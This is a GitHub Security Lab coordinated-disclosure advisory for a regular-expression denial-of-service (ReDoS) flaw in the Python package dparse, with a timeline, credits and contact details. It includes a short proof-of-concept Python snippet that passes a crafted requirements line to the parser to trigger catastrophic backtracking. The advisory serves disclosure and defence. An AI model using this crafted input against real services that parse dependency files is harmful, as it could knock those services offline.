Coordinated Disclosure Timeline
- 2021-08-31: Created an issue asking for contact details.
- 2022-01-05: Received an email from Philippe Ombredanne (@pombredanne), who is a contributor to dparse (but not the owner) and also maintains a fork. Philippe has created an advisory in the fork: GHSA-38w3-hw4v-3qfg. I have uploaded our report to the advisory.
- 2022-01-10: Fixed by Philippe Ombredanne in the nexB fork.
- 2022-08-02: A dparse user asked for an update on the issue and I responded.
- 2022-08-02: GHSA-8fg9-p83m-x5pq created.
Summary
Dependency Parser contains a regular expression that is vulnerable to ReDoS (Regular Expression Denial of Service).
Product
Dependency Parser
Tested Version
Details
ReDoS
ReDoS, or Regular Expression Denial of Service, is a vulnerability affecting inefficient regular expressions which can perform extremely badly when run on a crafted input string.
This vulnerability was found using a CodeQL query which identifies inefficient regular expressions.
Vulnerability
The vulnerable regular expression is here.
Please follow these steps to reproduce the issue:
- Install Dependency Parser:
pip3 install dparse - Run the code below with
python3:
from dparse import parse, filetypes
content = """
-i http://0.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.',
"""
df = parse(content, file_type=filetypes.requirements_txt)
Impact
This issue may lead to a denial of service.
Credit
This issue was discovered by GitHub team members @erik-krogh (Erik Krogh Kristensen) and @yoff (Rasmus Petersen).
Contact
You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2021-111 in any communication regarding this issue.